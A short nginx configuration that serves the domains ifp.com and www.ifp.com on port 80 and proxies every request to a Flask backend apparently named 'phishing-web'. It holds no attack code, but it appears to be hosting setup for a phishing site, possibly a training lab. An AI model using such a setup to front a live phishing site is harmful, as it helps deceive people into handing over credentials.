events {}

http {
    server {
        listen 80;
        server_name ifp.com www.ifp.com;

        location / {
            proxy_pass http://phishing-web:5000;  # Redirige tráfico a Flask
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Forwarded-Proto $scheme;
        }
    }
}
